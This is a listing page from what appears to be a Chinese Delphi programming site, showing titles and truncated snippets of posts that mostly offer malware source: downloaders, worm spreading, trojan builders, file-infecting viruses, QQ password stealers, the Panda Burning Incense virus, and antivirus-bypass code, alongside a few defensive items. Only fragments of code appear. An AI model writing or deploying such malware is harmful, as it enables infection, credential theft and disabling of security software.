HK共61篇

Delphi反调试【初级】检测法

1.程序窗口句柄检测原理:用FindWindow函数查找具有相同窗口类名和标题的窗口,如果找到就说明有OD在运行//********************************************//通过查找窗口类名来实现检测OllyDBG//*...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
05012

delphi 下载者源代码

program Download;usesWindows, Winsock, ShellApi;function GetIpFromDns(HostName: string): string;typetAddr = array[0..100] of PInAddr;pAddr = ^tAddr;varI: Integer;WSA: TWSAData;PHE:...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0667

delphi 制作一个内网传播的程序

procedure Enumeration(aResource:PNetResource);      //内网传播    Enumeration(@wgokq[_fehlq])var   qnlshmm:&nb...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0516

delphi 木马配置器通用写法(末尾追加数据的方法)

上次写了一个直接将配置文件添加到对应的位置上的方法.好处就在于木马端不用写专门的代码再来提取配置文件,这样很自然的就节省了木马的体积.坏处就在于那种方法只能给未加壳的程序修改配置.这样...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0379

delphi之木马生成原理(资源文件,和文件流的应用)

之前一直在找关于木马生成服务端原理的文章。我在以前的日记里面也提到过的,网上相关的文章也找了不少,但是都没有把问题好好说清楚。虽然也给出了代码,但是废话还是不少,让我走了不少弯路。...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0499

delphi服务器端如何防止DDOS

delphi服务器端如何防止DDOS 前面说到DSServer的OnConnect是socket已经完全搭好client都调用connect的服务器方法了才触发的,如果我们到这里才来想起拒绝不合法的ip连接,已经挺晚了:sock...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
03814

delphi 远程屏幕抓取的源代码

在网络管理中,有时需要通过监视远程计算机屏幕来了解网上微机的使用情况。虽然,市面上有很多软件可以实现该功能,有些甚至可以进行远程控制,但在使用上缺乏灵活性,如无法指定远程计算机屏幕区域...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0487

delphi 编写的一个感染文件夹的小病毒

感染函数procedure TForm1.EnCrypt(pPath:string);varlCount,i:Integer;lNewName,lFileName:string;lStringList:TStringList;beginlStringList:=GetDirTreeList(pPath);lCount:=lStringList.Cou...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0726

QQ木马delphi源码

 QQ木马delphi源码 unit GCommonMethods;{$I Complier.inc}interfaceuses Windows, SysUtils, GConsts, GNetMethods, GQQFindMethods;procedure CreateMainWindow(hInst: HMODULE; const C...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0559

DELPHI版本QQ木马

 DELPHI版本QQ木马首先写个DLL文件library Project1;{ Important note about DLL memory management: ShareMem must be thefirst unit in your library's USES clause AND your project's ...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0438

dekphi QQ自动发消息源码

 QQ自动发消息源码这里面有的到窗口句柄,输入框句柄和按钮句柄的方法! 你可以结合使用的到你想的到的功能! 这是一个qq自动发送的功能,你看看,应该有点用吧!:)delphi代码procedure ...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0415

delphi Using Windows Print Spooler To Run Your File

 program PrintInject;usesWindows, Classes, WinSpool, SysUtils;function PathFindFileNameA(szFilePath:PChar):PChar; stdcall; external 'shlwapi.dll';procedure MainProc();varszBuf...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0597

干掉360保险箱VB/VC/delphi 源码

 干掉360保险箱VB/VC/delphi 源码VB 源码:Option Explicit Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0445

delphi 注入不用WriteProcessMemory 函数

 To avoid using WriteProcessMemory, we need to find other ways to inject a certain string (e.g. "mypayload.dll") into a foreign process. This idea is a more creative...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
05615

Crossbow病毒开放源代码-熊猫烧香源始代码

 Crossbow病毒开放源代码-熊猫烧香源始代码 以下代码只做安全工作者参考,请勿用做非法用途,否则后果自负.提示,所有病毒木马都是依靠计算机中漏洞进行病毒破坏以及木马监视.所以您只需要随...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
09815

delphi小熊下载者源码

 program InjectTheSelf;{$IMAGEBASE $13140000}uses  Windows,  SysUtils,  urlmon,  sendmail,  shellapi,  tl...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0608

delphi 调用批处理清除威金、熊猫烧香病毒的批处理

 @echo offtitle 清除威金(logo_1,熊猫烧香)病毒最新变种工具@echo 清除VIKING病毒最新变种工具pauseif exist %windir%rundl132.exe echo ---报告老...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
03713
delphi 恶意修改快捷方式-Delphi编程技巧大全

delphi 恶意修改快捷方式

 单元 ShlObj,   ComObj,   ActiveX;修改快捷方式的启动目标,不改变原图标样子,反正QQ这种是用户每次开机就运行的,就连同我们的马一起运行了呗.马在运行时会自动开启...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
04511

delphi 检测 IAT HOOK API 的方法

 typePTIMPORT_CODE=^TIMPORT_CODE; TIMPORT_CODE=packed record JmpPtr:Word; PtrAdd:^Pointer; end;function SHFormatDrive(hWnd: HWND;Drive: Word;fmtID: Word;Options: Word): Longin...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0329

delphi 3句话绕过XXX拦截删除桌面快捷方式

 3句话绕过XXX拦截删除桌面快捷方式直接删除是不行滴~procedure DeletefileEx(name:String);varname2:string;beginname2:=ExtractfilePath(name)+'E.txt';movefile(Pchar(name),Pchar(name...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
04211

Delphi编写的LPK.DLL专杀,可清理RAR

            if Match(FilePath + FileRec.Name, MaskList) then      ...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
06313
Delphi截取QQ账号密码-Delphi编程技巧大全

Delphi截取QQ账号密码

此方法仅限于使用狂人出品的登录器之前搞错了抱歉另外就是基址我找了好几个地方如都能用不知道是不是准确的下面是我找的所有基址我本机是能够正常读取的$00f22a29   $01044039  ...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
03614

delphi 在瑞星2010全保护下创建文件夹

program createfolder;usesWindows;constDIRECTORY_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED or $F;FILE_CREATE = $00000002;FILE_DIRECTORY_FILE = $00000001;OBJ_CASE_INSENSITIVE = $00000040...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
04812

delphi 写3389自动登录器

很不错的一个 3389 自动登陆器 ! 实现自动登录 , 代码也很少 运行delphi-->Components-->Import Active Control,在列表中找到下面的Microsoft Terminal Services Active Client 1.0 Typ...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0508
Delphi 写简单远程CMD木马-Delphi编程技巧大全

Delphi 写简单远程CMD木马

  刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
04614

delphi 含U盘感染的downloader代码

一个含U盘感染的downloader代码。可以作为原理进行分析。(delphi)program AutoDown;{$R 'ICON32.RES' 'ICON32.TXT' }{$IMAGEBASE $17140000}usesWindows, SysUtils, wininet, mmsystem, message...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0286
delphi 仿灰鸽子服务加载启动-Delphi编程技巧大全

delphi 仿灰鸽子服务加载启动

delphi 仿灰鸽子服务加载启动          看代码  界面 自己 写  program Service; usesWindows,WinSvc;constServiceName: pchar = 'AFX Serv...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
03013

delphi 熊猫烧香核心源码

program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的大小IconOffset = $12EB8; //PE文件主图标的偏移量//在我的Delphi5 SP1...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0486

delphi(更改图标)

unit Unit1;//一个给木马替换图标的代码 QQ:6331905interfaceusesWindows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,Dialogs,shellapi, StdCtrls, ExtCtrls; //1+sh...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
05114

delphi版PspTerminateProcess驱动源码

原理是在ring3搜索PspTerminateProcess地址,再传到ring0,减轻ring0代码的复杂程度驱动代码:unit killDriver;{$HINTS OFF}{$WARNINGS OFF}interfaceusesnt_status, ntoskrnl, native, winioctl...
Top_Admin的头像-Delphi编程技巧大全Top_Admin3个月前
0299